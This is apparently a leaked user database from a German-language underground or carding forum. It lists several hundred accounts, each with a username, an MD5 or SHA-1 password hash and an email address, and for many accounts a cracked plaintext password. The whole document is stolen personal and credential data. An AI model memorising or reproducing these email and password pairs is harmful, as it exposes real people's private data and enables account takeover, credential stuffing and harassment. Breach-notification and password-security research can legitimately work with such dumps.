+SeriallKiller:07eccb414a9535d7d3ffbc45febdcbb50871bfda:SeriallK:admin@galaxyfighter.de +Serverspy:1c7613a7c652f1469abe215f0f701a45::serverspy@hotmail.de +sh0x:6cb49704324159c709ec21dc96384e050d553a1f::phame@user.3dl.am +NWA:bb83df658978679c9b0713b3c718d679::philippb@twinmail.de +He1nz:30e05ac382cdecc78919170cbf2ef1788af6b530:123456789:baui420@yahoo.de +knight:a1f4c35c2021970579f7cb8f58bc621567ed1c4c:123kirsche:cesar5@gmx.de +Aldur:4445cbd8fd42998f975b4d447d0c13b3::Rey696@web.de +Opxes:1b7e06b8ee1e04aaf307518e68a8af069ae6c101::Sexperado@hotmail.de +Shisha:41a139a7a60d53437da10ede69f45acd::paypal19@web.de +Cap:72562b4ed0826714643f24a04250e6bfee3ec083::john.wang.lee80@googlemail.com +Staix:05bf54cd25c2b677bdd1c4bcf16922a8::staix2210@web.de +mabo:a7a6c71876ed829f9c354df72bb72b610dfdde2d:melina:mabo321@gmx.de +Desaster:c7a520709c8a50795ff9334d412bd087::d-at4@live.de +CrazyBunny:deca2b41697f63b3bd04325d55cca202::crazybunny@discardmail.com +lorenzstyler:78571ae73ca10bd5e93d877a41051c274b9d5a72::deutsche_wurst@hotmail.de +smokie101:4ac492a98f1b1ea356e6871ddc431a32edc537dd::forcedesign@hotmail.com +hooch:8e2458cd2909f9333e023e836d50246c::hooch@hush.com +kabounce:7646683e5cdb6bac71a9e9deb688fc00::paul.schroed@gmail.com +BluWine:b799b625e48593b6c740c64e792a528e::BluWine2@gmx.de +nextkit:b97e866fd9b8bea6dd45b312bcbfa73955b8add6:smooth:nextkit@yahoo.com +KnechtRuprecht:36e902374e65aadd09b44cf35b9d0699::penismamba@gmail.com +toni:c1569b4227982038ae0d9ecbecfc02ce174e1265::toni555@mail.3dl.am +razz:eb214fb0035b1f39d87191c436322af6::e.w.e@gmx.net +J_Bunny:487e01db47001205350cd4ff7cf1d6481af74a1e::jasmin_haase@gmx.de +asdf:ca0431b4046577e0d896409fb8245621::asd@web.de +sourc3:32f9bced25671b60fe2036f98671927afa41fb67::jilly989@googlemail.com +dcking:d037c07711b0ba5974beab67801ed7b9::niveas18@hotmail.de +bowwow:d553572e04f7f663f72045e619ae6ca1::gstylez90@web.de +Belidanna:af518d5ecd1def7d3e343a9b67e8114837eae6aa:Mafia.245:belidanna@web.de +mr.fake:71cfda019e0dbd6023656bbccf16424954b2b29a::bandidos@hush.com +Emberka:ec7c847558998206be3ca3cb98ed4553::Timodorris@web.de +yes-Yes_y0w:f2e41be3c5d462a4120cab74ca9cfc3a7d2f86c1:lolrofl1:sug99r@gmail.com +Solaro:4180b6a33b41c05b20b7133cf924dce45dbb53ca::benekebot@live.de +HITLERSEI:aba0e1696e31933d9528e159cf78ff77::andreas-sage@live.de +headseeker:9bc193647fd9df1f6324c3b61850a30f1f1a9be5::headseeker1@gmail.com +Maxim:8fd576879f46afdc1cff65d6e6570a84::crashstudios@web.de +d33rhunt3r:beb05fb774350768d50009a4047008a4::pimboli@gmx.de +geier02:08983a71d3b708cd61dba4303f389f7c::sedrftjhgfdertzujhgfd@yahoo.de +Socks-Service:39f5f34c895ea68201b91586fff61a27c2e91914::info@socks-service.info +tscheppo:ea10e430c2c5833c77d5bbefd0f75d12::tschepp-daniel@gmx.at +lololol:48071b99777160e3b1ee96ea091f9f7ee0d0c32e:qweqwe1:hansiwurstilein@yahoo.de +g0dL1ke1337:b9e09b78fd0c458abde5ebda2219d32b0f7a56a9::nozznw@googlemail.com +Awebb:99a2fc22b4e3a33752989436c0ebb93446c2cdcc::daniel@warez.tc +Reto:dc9a676069d14cfade3cdd8a9cf9765532fceaca:dragon11:narutoro@web.de +Nobodz:dba90efb062657c691e8d54a06bbc006669338fc::carders.cc@secure-mail.biz +DebitKiller:ada307e1d4f2af77f1694389ca0e4553::katharina.kolbe@gmx.de +DCX777:24bc2e6f5238ca6b10f6fa3f74506ca3::dcx@safe-mail.net +lSonyl:104900230f1db65434a4fb96d1bb305c::c731059@web.de +ub0t:5c2dedcab4c13c9c797ef974385969c7::daniel@e-mail.tl +KingOrgi:e73c1ce0e9685f70540bdcf18266e29f154f662e:siemens:planet.suppord@web.de +Burner[NEW]:2a781a3a2041d8e00356768406e0cefbbec27c4d:fantasie:g.m.obert@web.de +Lutschi:0c65694ca0b59f90376b0e29faf2b1f0dbb5ced3::mira1337@gmx.de +XRave:11af41efdae35daf3811c7622c9ae6de::merthin.delia@gmx.de +iMMorTaL:c1ede8feda73f3690cad0bae7653a5976dd3cc42:spongebob:borz_pool@hotmail.com +n1tro:efec4ab750771dfb4762a60b711dd8b8::n1trodd@gmx.de +Zapdron:ba84cbbef1fa06ad23c62f212c84507b::TomEB3@web.de +Luminate:0e6c191fe201a68564b00279209f5e21::dimama@live.de +3M0_Fr34k:9bd9a42e43ffe9ffe5baa65ca4af2ef7::emofreak@mail.ru +Psyde:289d390f7453a6a1ed6b89a3ddd59ce1::a2712471@owlpic.com +Banger:29a8909990a0d6e374ba1860a9c18bbe::banger90@safe-mail.net +j.anderson:5dd38016dbbcff3199f83a30d9d8596077224162:anderson:t.petersen1@freenet.de +ThE_nExT:e103b9422fc5b38bdb3d9939de12c3f2::Broadway11@Web.de +RaZ0r:79c626ac5decf3ea4a3c28e88672e926::nono005@hotmail.de +Kolovrat:719c4bd62f9de60e08d29de8bf1162b90b9fdf29::edelweiss1488@gmail.com +cooltranier13p:79c6569a7ce0d955eb57acef12d0d1f6::rashad3g@gmail.com +Fantakind:5f3544e83f53f9b3e50c4b3fb215ddc9::Fantakind@live.de +metalzare:fdad863207319f0a6568c134619ecc68cf730064:Hauke24784:h.maase@gmail.com +Ch15:a3fd63180f05c4576e90662c34d360fb::ch15us@hushmail.com +moveinsilence:1ab943b7557e3d9890a5f4b312a1e2ecd769c8c5::move-in-silence@web.de +Tu2Pac:6d4856ae867ba4c38410180d454411f5::Tamilplayer_Gangster@hotmail.de +RaKoS:8df6366ecad741ea907a1919fab680bb::RaKoS@mail.3dl.am +barlow1337:f8054e6787799a4081765249807a68a3::wildesluder1@live.de +welovecarders:a5221527e9e8987e5412aa3a61664ea1ecebd61e:bigbig:pcheld@hotmail.de +UseNext:c4016e96a694cb0c43a1b8588c5e0532be0c301c:251090:a3491994@uggsrock.com +w00t:9895c10756f1e9d8ce37d4c78f8f347f::fl000d@web.de +k4l1n:c10457657a4000b501716551dd52aa4e81e351f4::metal.man.xxx@hotmail.com +mathiasgoletz:e46c46e6f38b7861d2373a646e300410::a3496022@uggsrock.com +johnathan:4881fccb67294a7eeca9abc78375c128::a3818955@uggsrock.com +Frostie:242417d098fb73790af7da3d36b7b7c322ee94ca:asdfghasd:ritho.ritho@googlemail.com +VoxX:5a32b56f8bdcc74acd852938f3c47d81::max@unteregger.de +DaisyDuke:a2a818e5e6bb3c1a0138e97f2dcbb7fc::huber.kevin@hotmail.com +H1xx3r:f44b98ba1b64abd0621b335f3543a38e387f1d3d::h1xx3r@mail.3dl.am +hrkleZ:840b50cb93b4dd55d973cfd10f65e560::g_player_20@web.de +Headshot037:faf86f2298b0cec43b87c501c6937e84::samuel.schmitt@gmail.com +n3o:55b0ce8d3a5a18e9abb8c13fe52a949c::psytox@hotmail.ru +lowl:87059eb91b80559c197ff9e8c8ea003f535dffe3::lowwl@hotmail.de +g4m:97f6185b8f4f8f8122f72341bfd9dd7dd542cc67:momo88:muuuusik@web.de +Lacrimosa99:39c5fb69535004ec434dfbf1c241269e::Lacrimosa99@gmx.de +1337carder:2bc5fa5e5bdd2d105b01dd2c4464df7e8004371e::passkontroll@gmail.com +ghetto1234:98dcefd452c43cf3e094e0cff51aea8b::marcel1.funk@gmx.de +BaDriX:243a06e2cc3ed167740967b797a599bf::alfonso@web.de +marilly:d76a614e460e868c13ddd0bac7611a4f::david.jazic@gmx.at +Dauni:b1de78b0a2c8b6ad04668fdd77413f0d::uowe@web.de +balisto:e551c246b991a092415364132ee765a8::balisto@cust.in +1337*:96ee8a02b575d5108695faab167137a3::aller.aa@web.de +metrorny:80c2c0044c834b8a61a44a660533928f::metrorendezvousny@lycos.com +Enigma:4ed1442a9d6eaa124f6b143c66c4328d::hans-apitz@t-online.de +peterlustig55:67327a601163e33e625e5c3fffe5f623::zkadidfpqtlepieo@emailsensei.com +~1337~:072ee10334d6f027c74f6d8029a91db0509e0f6a:h4x0r:afibhuzoab@web.de +sixty:d7c14c75e05830a8c2246f25e2dde2e3::hosting777@Safe-mail.net +3Xpl0r3R:c9575691f87121a748f4bc59d9389e8d9197ba96:147852369:8798798798@sofort-mail.de +raz0RRR:8e5ddd18d4c35d11a4ce18dd5c3ae5d813f3096a:lollol11:caper@hush.com +ViD:ccf7c2969739739855053a3596013069d687ea6a:filika:vid.aeo@gmail.com +mafasi:ebb79409c785adaa2850f764daf8dc87::a3549314@uggsrock.com +petipenner:900660b6e070d62dd7eebfa0e2312510df49ef1f::einzahlung@bk.ru +Anilman:c4a8e5e469fff57f9d8c9cf6d60258a3::madmaniac@web.de +Untouchable:42d915f2195408d0e642e60d612a1c0f::untouchable5you@web.de +BlackWindow:1e9b9088beaa967d755984624fbf2660::Stalkaserz@hotmail.de +Sunny:13124521786f4e19d5c5d8b8679faf36::666@warez.tc +crashed:211a85c79cc029255ce305f1daea7447::sallar-g@web.de +liteloops:6d3d1056c1c8379ac9f2f78e010547e4::stolitsa9@gmail.com +MZHUSTLER2265:e053678af3171c19d7e9d7a3c7569fa6::MERCHANTLOVE@MSN.COM +caller:eb749174410d37b13005cb850fa3c82e::dwqdw@web.de +Houseamp;CoXx:45967eae491adb0a87233c5af53c860a::house@Secure-mail.biz +pakiboy09:2ca96e759826087a4626ca10bba2842b::romail.khurshed@yahoo.de +crankus:453f040ecc5beb99ba63b541e6a5c74e::crankszen@gmail.com +PL9X:8a1ba1fea017803951a009a7f1736ee1::NONAME@z1p.biz +s4mus:7518732698613e40ddb82775e1c3d8cd433fcfc3:st956723:liquid_ecstasy@gmx.de +Ricardiazzz:1a8753ae208a313b20a89752fa559fc6a907cb48::Ricardiazz@gmx.de +gurbetci89:7b8e84443274f0be11a3d5eff7b9775c::sert11@hotmail.de +sunshine:a38b1380b6506d57b6b41731d39a750a::t1m0_82110@hotmail.de +zerocoin:fc1f5647ab0208213620e38db456f230::JosRat32+1@googlemail.com +V.I.P:91e2c91d04559371661817b4fc7b209e::huto@hotmail.de +Balisto89:bb5d76e36a9b9f50493581ac760429ec::max-lewin@web.de +Toppit:aa025545632ea55bdc03fde60207b5e8::tom.manske@googlemail.com +annihilator:a9d08e471ab36efb3ace0fe4175fa230::annihilator@gmx.de +ivenom:bc985086d3f4e524acd71838b844427b89d1edcb::ivenom@0815.ru +Eiskalt:265a453679dabb851db7b0f9a7511373957ab178::glueckskobold@gmail.com +Dn123987:4439acfbd41cbf3593740394c1b03efc::Dn123987@gmx.net +G3ld:95801917233e783ff1beab77e3ebb9a2::frei999@arcor.de +Speed:523572acb93f19c34511b6038d7c8693::blernsball69@gmail.com +heavygun:488d5897b6121f3b5c67716011addaf719094eae::Enjyu@web.de +Maleficus:db952bbe7b6f8bc862d2bab57070132e::lollilololo@hotmail.com +H3r4:d0f6c2eb4b764ca8c56daa7ab2b42d62::l00s3r@rocketmail.com +Evil_Dead:5b8df23bf09fb72c6287a380c3cfda4bd99de900::hannes1@mail.ru +hansdieter13:3161c931f9f00717620f52d2e5e722a03160acc9:christus:hansdieter13@hotmail.de +saurersimon:9654efbb5ec3bbeded9f1a951a7e3608::dwqd@yahoo.de +bl@cK!:5949a77c15c5b40bdf1160fc95bf8bf8::admin@black365.de +helloworld:0002445ee35947bc1a01ed6e232c2a2b3f61d362::domhof@gmx.at +jojo:ee7491e505a29058a4b47d65559400d0::sdlfufg@live.de +PeterLustig:b760df102958a1e1a8cd72a2e7f0cb76::saber@yahoo.de +SuperSepp:367394a237e938485dd1b2dee61b92f4::hoijoo1@gmx.de +snalor:9ded8da9efd97951080d75b090e21987::dickeraltermann_7@gmx.de +furkan2010:a6746cc913e0bd04d9f434ad150e6d8b0ffac006::furkan-oezer@hotmail.com +noobi:ca165c9296281c48bd1c35c14614468d::noobihunter@yahoo.de +playmak3r:08a8e0b13ccd0eda3e9c85313dcbc260::c.heezy@live.de +N-Skyline:da1e1cdcc8d48037855f2ee2763b4064126fb5ea::n-skyline@qip.ru +lt;businessmangt;:ff4bbcf321fefed2b405835cf6138e56::happywithvisa@gmx.de +parsefloat:156c488e24fb85f0b901c48d3f9f6239::parsefloat@mail.ru +KoB24:2b6f73571e45f3ed048eb8d94f48badb55cf370c:kwantung:air.m.jordan@arcor.de +raydonavan:385414e31d67fbcc81a1f743b6c118fc92015bd5:jackson:raydo@0815.ru +panno:153dbab318c0d294f9ec9fbe6d774c79c1863a63::panno@grauzone.ws +Kelleraxe^:777864889b1ba8cdf809316a65823248::Kelleraxe78@yahoo.de +incognito:c1871b3a44fe8296f8526ca8f407d3bb::ognito74cin@hotmail.de +apochi:959a0702b60465cce9da0f95c692ecdc1216d77b::apochi@mail.ru +PerfectPrivacy:ef3d748ebfdb91ec80c7891970679f2c::perfect_privacy@yahoo.com +Sulex:9ab01b688e4bf00f5707adb07f37be44::sulexx@hotmail.de +ajeshoven:b5b443863e07aff863a133d36502b59b::fouad-germany@hotmail.com +m4ckh4nter:f84c5fe5567e358d315dc9e7d0d428cdb327cf84:sven123:raparmani@live.de +Ukash:e46b5bab2625c4a2dd1fe4e8f2c562deddabeb03::mail@megaserien.at +till7:f034a7a694aa78e37bed7bbfd753b0657e212603:eitp5icn:thescore@windowslive.com +BlackC0der:141261105c5b93c68ca573893e55745f::spam2@ivacymail.com +kRoWneD:f1b5f6d411bc92e1a2dab4fb95facdf97d38419c:123456a:felicia.malon@gmx.de +Ksmer:970db7a50ca6d7f52a3b57eb54d61d78::info@twodots.de +pizzA:472e7829d5c0b0f5459937b0d063063ebad6d89e:besart123:besarthh@gmail.com +Sinobis:c40c2d13259689c7dd71acaceb05d487288fcc1e:190795:wowforever2@web.de +KiNGDeZz:929b964a7b6960e86e0382b152ba06dd::Bushido123-Dennis@web.de +Morpheus:e6d215af7aefa7f479b665382bfb9d2c:: +IRuleZ:79b21f1f89749f981ed7b551368b5919ce041811::IRuleZ@spambog.de +Sun.X:ed02c959d5819b937c7b2435bf04f130::proesl@yahoo.de +Logitech:2fa8c5a27fa6b27335e48c71e8ad283c03890da7:master11:iphon3gs123@yahoo.com +halohalo:9b0d9b52104148087875abe37de34292c51c44c4::saisdoashd@wp.pl +cr@ck:ea974b0b85983d7d4ea5051fdc812ca7a7d46451::jens.s94@web.de +impaleD:8baca1f73d1e5f54bf1ae1ef66179fe7f3aa0bff::7h3fish@googlemail.com +KarGo:18f3eca42f6b304f40ed29087ce7ac00a5a4341e:PKRV50:KarGo.kR@arcor.de +vshlog:a43922bb0b7372181c1f9e06ec529428::esierp12345@gmail.com +Th3jim:91935cd1964634f6dd1a85f863680e69::lennart141994@googlemail.com +mÃƒà ’Ã‚Â¤xx1.0:cb04b3af93f20b198fae425de8dc2e02::bauer890@web.de +kRn:23a240a5af0effcddb975b431ca03b82::proasfa@web.de +TerrorFoX:05279956cb58b3944765410ca55acba9::butterkekstorte@live.de +Ronald:560c1c71beab23054f30a09d36cf7b9f::rocking2828@hotmail.de +SmokeTooMuch:e5de40d22607b979442145c6c1c36864::matze.mcx@web.de +Skorpien007:dbb05c020360977ab853aa1f08c7b985::skorpien007@yahoo.de +shinsheru:1a2c7717604227b56e74cf9be0227cf8::quellegold@web.de +paschka:043bc2bd707721d5bff3b4c7bf732712631583b9:samsung:ruzzian.paschka@live.de +killer123:a4ad3c89e4599ce937af180bb286d755::undernation41@yahoo.com +yarakmasiv:62cba6fc0a14f0b6ce5588f326a42707::ali-player.259@hotmail.de +BlackNova:b7256bbebdb30fe8cbc804ff5627fab1090bfd5a::theplay@gmx.net +sergej-avd:7d83ee95113d382e08625e29ccdc715b::sergej-avd@arcor.de +nokai:7be7b605393c419a059a3736bfd4a15e43bbe473:sami23:sami.bahloul1110@gmail.com +casali:8528ffc4790e5fde0ce485b97b5bc254::weangster111@hotmail.de +h3adsh0t:c9ad6344a24b88f0237b0f243efcb929::denis_S@kabelbw.de +Nehgative:ff2767d95ec53104b35e255904443071da766559:ub3r.:a3613887@uggsrock.com +kevkev:b90e3ffe7bd26e8432a8df084a77bbba2881093c:991257:trumpetboi@web.de +BackBlues:cc96631a2674c51058c4a8b5094524f2::warpilein@gmail.com +Tazz:7b45498ea0897ed96b652c2b07c4f1f5::Tazzwarez@gmail.com +Tyrell:63985fe8d9d9fc274d72a911b897e53e::hbcc123@hotmail.de +Eldolol:c868a11e609d26c41ff6bc3acc13018b::sakurey@web.de +anone:a571d43ad86d73d9023a6c3c959682ca651c65a2::anone6234324@hushmail.com +[UF(o).]A.:d0a675d393285caebdaada0052537439c98df11a::Lulu1600@web.de +chanhex:6d6cb0724a3492e92a798c9bbe78baf5::chanhex@gmail.com +d3adl1ne:5110addf51c2865c33c7b86f6f0b4038::rockshox12345@gmx.de +Pradasport:accf9896df8b0e2d8bfd07c7c0b7c490727204fd::tomekkp@hotmail.de +Maxxle:f9a447f01ee6ea9bddb2ed4cf556e29b6fd219cd:hurgel:maxxle_93@yahoo.de +ketastyle:6e4775b713d0b3f4e92395f18b83c2a1::el_biscuit@hotmail.com +lord drag:f1bc26b7135759cc5c6f5f1c761b295eb756be94:juli123:julius_heinisch@hotmail.de +Android:b451a71ef88c71a77cde2c6d5533362c::ansroid@e-mail.tl +blackmakk:01f9462b8c31a92617f081b8567f50c96021c938:metal1:punk-christoph@gmx.at +Ignorant:499d54726269ced2890e55551444615373c7eb8a:08154711:00ignorant@gmx.de +eXodia:42c56f0e5f2e9af88db08499a22fd15e::hanswerner85@googlemail.com +Unauthorized:5acb1e98f5f08faaba21c36d6d2e8ae3::blockme@blockme.com +cclieber:6f62bd8ebd11b696173e6270e235ba7c::mohammedalmaimouni@hotmail.co.uk +Dr.No:1053c1988bd87d2d1f250bda437b95c8::gib87@nich.de +schmatok:f8e7e420f38c35e3fee6e595e44ed03c::schmatok@gmail.com +Fly:c58e00800eaee60867017a61c2b1cf0c::flyy@mail.ru +eXecute:4e209166d4c40861f1058c3c9c827b822a8d8dbf:killaloop:execute_@bk.ru +starQ:f590c47af4aa0d4553ea2f764a6a2004::gafdsafsdfsadfsadfsadfsdfsad@web.de +BlackShadow:171238def3bf3718b42bfe82da755c18::housedrache@googlemail.com +5p33dy:0931eae53619e936a2e9cdaca6cb80ad655f511a::djreloaded@live.de +Scooterfreak92:283a8f49c046a0e2dfbfaa0bab617d00::Scooterboy92@gmail.com +CrimeInPerson:3c861371b9de882ffda01ef0d9ebf365::Max.Oberma@web.de +explosiv:acc06d4095fba891afc942943760370b::ali-akinci@gmx.de +whiterussian:862e69ad1b3dbb5666ef6da30757aea03c135c48:1234qwer:pushy66666@yahoo.de +dncey0:073b741563156ad145c31640022106fa5630014f::mad_mike_90@hotmail.de +Junglist:e042370ff5aa2e4833eda2bf0b928ed0::ehubels@front.ru +Der Mensch:68e4b0e0c65f8112b800a7e065424253::apemen@hotmail.de +2you:2bb676c1139e19a27f12a2aef4dcd1bc::2you100@gmx.de +omoghare:b4cc9e55321a0efb5a7db59edf8ad374::9ja999000@gmail.com +d0h:6656cbb68fa22234a794c8d26cade4efb0fd0ebc::stimpy@mail.nu +Ali3n:8178502060497a40814d845b6424ea2f::Speedload1337@gmx.de +ripper:c4954089e13afef7c382726e8975936d::antjebeich@yahoo.com +reQuire:3fb593e1b862c956f3817b7d6f7455d21058a5b6:asdfasdf:helperfun@web.de +metalwarlock:f12f8a1584a4812a9134936ba8ab80bc78d885ee::dr.anabol@genxxl.com +MerTreM:7b95c563b1068162dbacf79a29f4c7503718c8a6:mert92:mertrem__@hotmail.com +cc-seller:1dda2339ed6d01e2d3b53180c268d408:: +playfiftyone:8a44c3249b644d90efac38f57903bf15::aloha@live.de +necory:98968496195ff58e20a87dc38d13c7692b53697b::reppy2k3@web.de +mario_1989:59b06153a5faebf5c8e0ddbffab6ec73732698ad:logitech89:juliustandl@yahoo.de +criminal:a85dd7044f22f3931d13197bad3d5dfb::aggrokatha22@hotmail.de +YaHomie:f1487f8dcdbc4caea7f62cb3c2a0d607::yahomie@live.de +Alex1811:b218d23874e5419594767ae6da343db4e76262dd:nicki1811:Alex_cool2009@live.de +deutscherrusse:c91f30043dc8cb4c7504f820c247a274::deutscher_russe@yahoo.de +iBuy:c0aa63d79183b59eeb33483c03fdcc14::nevertrue@gmx.com +Clonix:c182876e08cb7c6b58d2fa3e9938d1a6::gamer123456@web.de +Doomypga:f1d1a5141103a0b8abaa859b2f5ff5ff02bac0ae:heinerkind:dumbofuchs@gmx.net +westsidez:0b60bf276040d3302661f75c2fb7d8a2::habiti2000@yahoo.de +goll89:42dfbda80b32d0a8fcc5f1165a1008bcc8353703:simi89:goll89@hotmail.de +escequi:0ca4c9bbe0e267cadfaf89c77b4d410d::victorloke@hotmail.com +-Davidoff-:d2f77a622a62f504ea8b939757f4654b::axs@dr.com +scoz:ea08be39613504b4356201c5877c439b67fcfe07:sucked:jceiley@aol.com +dPLUS:eb95d8a7c30925cc8024a6277bbd4fbf::kleindavut@web.de +tatschi:513f5dd3d85d20cfa0852cbe485a26dce0e84787:ajay7577:undercena@live.de +optimus prime:d207b2833787dcfffa63a3a9d55a2520::mzzi1@web.de +yatko:559c074a8d187af93ef8b9b10c3e7b7538b49485::yatko.07@hotmail.de +KdL:78cd8ffef4f4ce3bd43b9bbea940ed1e14fd875d:noobyfee1:Thomy4678@hotmail.de +blackpanther:2fe0f3b40b8ae1256a0aa529e6b9d5b00aebbc42:qwertzu:Erika.Kunert1@gmx.net +Masterofdisast:93ee1d29650c1b2439d30b39380d879e342e5a53:13371337:nixis@mail.3dl.am +Neque:2dd695407b848c02a34cd3af96d3202f::geka14@yahoo.de +bower:8b0f1dd20cc0307573aba5e3d9b8fb14::bower@web.de +XTremE:96a0064b2f84e51597e9697c5fa98ac9::hahaha@hahaha.net +FreakHood:a936b5b90beabdd87be2520e05dd8b6f::FreakHood@live.de +darknuts:5ea89c4812922c02a34eb91f87b9cd0a0c15174c::punkit@hotmail.de +kraopatis:52388dbdc6b84e69b6752fae5048d32a::m.zilinskas@hotmail.com +carderxxx:50a2885c6dede65519772187cc5153cf::sebastian.karasek@onlinehome.de +Kingsolo:b6051fb54a02be637594905c0d8f50f377302fbe:delta1:zoican0205@googlemail.com +speedfreak:85a1df97e5aaa7eeac0966fa92a61e9ff3344822:jjoosseeff:eddi0016@yahoo.de +mushy:7e25dfd59de1ef688a90727ac5007fb8::marikesanghera@hotmail.co.uk +yarakosman:ed7ca46af408c93d92c10daddb08de7d::heinzkesebohm@yahoo.de +anykeys:d9ed551504c3fd2d7b1e843d2e344bcf::reichelts1@web.de +lyonz:ea2626a220f3ecc6c1d2ec72125af899::lyonz@hotmail.de +cango:dcaab2d5768d07ceceaa09c1190a55c4::ersguterjunge2.5.9@hotmail.de +c10stomper:8488e54c9481e65defd690e2e27d658e::sqamardin1@gmail.com +Owned:19fba52dfc2392776fd6e0b6e7ebf33b::jonlong66@live.de +Ace:d5d76233e5d42ba04b9fa8add3dc28674ddd31cb::raffy141@googlemail.com +darek:cb5d57e7568fafeb47befacc52b197fd::darek@hush.com +icke101:2ffa0a7618198ae156a879abb29ed3f623097a21:mercistoy:icke@web.de +Bi0virus:f676d4783a1947fd958c3487f22a8d23acaec867::checkmyupps@googlemail.com +lolrofl:ebd74f538d877529e3e3ecdc0ed42dd2::123@123.de +neogen1:3d3e6ce44a31e7677fb3c8b17c4e915116f74845::neogen1@web.de +Splendid:6ae8c32ee48c2a76d516480e7c021b1a853ca2b2:mw221u:hansbaki234@web.de +skyLee:5ebdc2ab237ee2d749a0d827b525ebb2::Yannick.Fake@gmx.de +r3iku:ba1fcfafcb7e2879a08a28f81f91965c::r3iku@hotmail.de +seiris:bd47f137a87c3fa79b8cfb0c7d15af6a::seiris@gmx.de +JayKo:b6fbafe9ebbf875d7a19d0c8290a6240::googlemail@googlemail.com +hoodranger:e601b42f930055ae546558635892ba22::postan2000-hood@yahoo.de +Mochi:36e673a0500ebdfacaa78e8dcef6aa46a74eb2bf::mucha_sleipnir@hotmail.de +Faceman79:f9def8ea70e6bf4f1705e2abd356218fad52e85d::Twoface79@gmx.de +Mortalcookie:e9e5bfb77fe6dde56f39ffa2001295e4c720d449:dattebayo:bunshinno@googlemail.com +Rebelabt:895c851b93d52fcdb77cd5f5f100816d::bo@gmx.de +keilafcc:5106f3555214960e59b635de9a9de4c9::igor0071@freenet.de +schmitty:2d8a1c559128ae6c637ae12e382c1724fae78cee:987654321:soda2008@web.de +Grasso:f56f7a599541ca87e1e25e15d3b674c984698247:yxcvbnm:zuhausesein@live.de +Tetris:93d7bd0c12bf511eddf9092548e2f39ca62b134a:spyder:lukasquestler2@web.de +ExTrEmE:619860d5ca487b97ce08461ec8b01f54::sffdsdfsdsdffdsdf@spambog.com +ickebins:eeac8d028b5cf58f78496f939a0c6ff2d9bb100d:test123:a3684498@uggsrock.com +kastenfrosch:f6a44c867c8401e06674ba87428e6d59::stefanbrinkma@yahoo.de +shogun:9eaf0cabb88ccbf92731d72c0da01cca6f59441e:123456789:d.kalkhof@web.de +Li:cab4ea971aeadfac551a9de00a77f309::a3687339@uggsrock.com +Foto:db9abdc72fa3faa55d5d18bb75ee1dae::fotoshop5@gmx.de +K-Gee:538e55ff84d264dd1ffbdef36fc2c780::R-gies@t-online.de +Satan666:ab5bf03993196368c7a737e02bbd97e25b6d81b7::maswobdo@yahoo.com +punani:4219e5a4b41845d6f50997f646692ed7::shimon2408@googlemail.com +Hade5:49cf48197fe38dfe4c347bce8d3b7b0e::g0o0gle@qip.ru +zap:f6160fc1962a698ea1c94d715c67daaaf8236da0::flubb123@web.de +aKa_PaYbAcK:a16edad8c5d5180078423d5ff06348aa::felix-koso@gmx.de +Vinnie:23e05d22949b0ec0da01144ceb318d0c::vinnie@sogetthis.com +Jack1908:8588ae2d6dadee100dbcf26c1337c728::IcCiGaHf05@web.de +Cash:4ae7b8bcd8f28bbbd505ee271e14999e7d0d7df5:changeme: +Headz0r:df6643015ce04fd0a629aafafa78ac99ca4eec95::hh_reuzt_hh@hotmail.com +maggy:ac1b0927aed6e1b77cd739e036665e09::lastmaggy@yahoo.de +backspace:0b78e3fb4e3e3505f1ab54257ba2472b2fabce50:calebcaleb:meand_yc@yahoo.com +Jennifer:f667ed81cddeadd2d9fbc34e1136672e::jennifer@nightmail.ru +ZeroX:0e16b943802b6de021f7a56028ac1cea5317b13a::Melobomme@web.de +Pille:fa19b591be42e03fae58f502c16b61f7a7e6c64b:merlin:shajandow1@oleco.net +TORCIDA:71d491edcbc4cf423e21b83030dcd856ab39a90f:EPBp4y:lol-wtf1@web.de +Butch:ca3295df49c2eaffb655001aba0aaf9c::nadaregla@googlemail.com +Sh4d0w-F0x:806f4fd3c6457d88b32610ea33576bc0::shadow-fox@warez.tc +Noes:0ca91015310340d1cd5ec0523876af80::Eickmeier1@gmx.de +Stef0x:b11fecce94fb67d124183790f3285df088459d95:trimi12:fourmula_1@yahoo.de +Invisible87:60ff5839b2a26ec7e3bfc549bd12185b::HolgerSchmidt1960@web.de +W0wka:f169e29f3cd5a74fbe3fd3723c9cf86ca1388728:wuha123:robin.firebal@gmx.de +C!t:da8fc744957d1ebdb8a87f2808e8a51f::virusscanner06@web.de +Bankdit:8c1ad533680c4aea6480d254467b711c::marceem10@web.de +mafia743:e80c2209ff183a4461478e9d64b5eb13::mafia743@gmx.net +X360:aedcbca3267b10ed21d18a06919995be547f1fe4:dekoder1:polska-for-ever@hotmail.de +Valli:5b4d0244cb9e7a678d87b97d29bbb426::vallikuriosi@web.de +hacktheplanet:989e2e32ad362692b893f79df5da72d8a8080a07:dusa123:blablablub000@web.de +mag:783b477137c8668776fe7d72d6ddccbe::ichwilltauschen@hotmail.de +ALPACINO:94cdd8a871400cac62b2223ded9e70df::rosalinda27@live.de +teflon:db299ad0a81733b8cdae297cc82f34c1::kokosbernd@web.de +polat01:87c94b44c4e2c9e30c256f8967b7c601::bronx81@hotmail.com +DieZiege:79a2f436b1b363d64fe57c5a5a6dbea7::vrangornxxl@web.de +blacKy:3a5ca95d19be25334e44a0f498b263fe2f5aa0a3::feta61@gmail.com +Mrabcde:41f6395639a5a1c7fc2070bf47e7f10660be19ea:hans1337:wowsascha@gmx.de +C0unt1ng:a396eb52bf45aab3675a9be65596455ee3dfdc74::cheaterx@ghbsys.net +ozzstrikker96:553d6c7fc5cb3d5ba504d104a9edbf48::abudabimasuri@yahoo.de +Legit:540ae53a24c5969c4886faf7f9fb05e376baa581::pershua@hotmail.de +PAN:e18d8db7f2a4ed9e41534e97b970658af5ae87c7:fabian007:dashman@live.de +Mr Visa:949bcd9342345f168dca9459b02078e3def80041:00:jhgjsjsg@yahoo.com +Mischa:4859adcb2a31cca4b5828bf5b41e9f7e::jhgk@gmx.net +player_227:f0ff4d61983a903c6b21018d77c5ad80::gingispole@yahoo.de +dollarboss:b0912f0ef7d92af0039e7438f271e4a615ffb688::a3754347@uggsrock.com +STEAME:909834333742c3faab23970f08ed85f2::dwaqd@yahoo.de +sherefadanoum:c553e75c386e14172af9caa9e67cf213::simon@web.de +stephan11:345959e96c5ee3721650ea3c5d79ea56::94@hush.ai +fiftyfour:7b781eed927530e8f30de1ffdd95bf16::2S7Nrhbnn3nnJ0pf@Visit.OnLateDOTcom3.info +Efectaz:aaee03a2e4e9ec31d39911f94438d24530e0d82d:lopaslopas123:nosound@info.lt 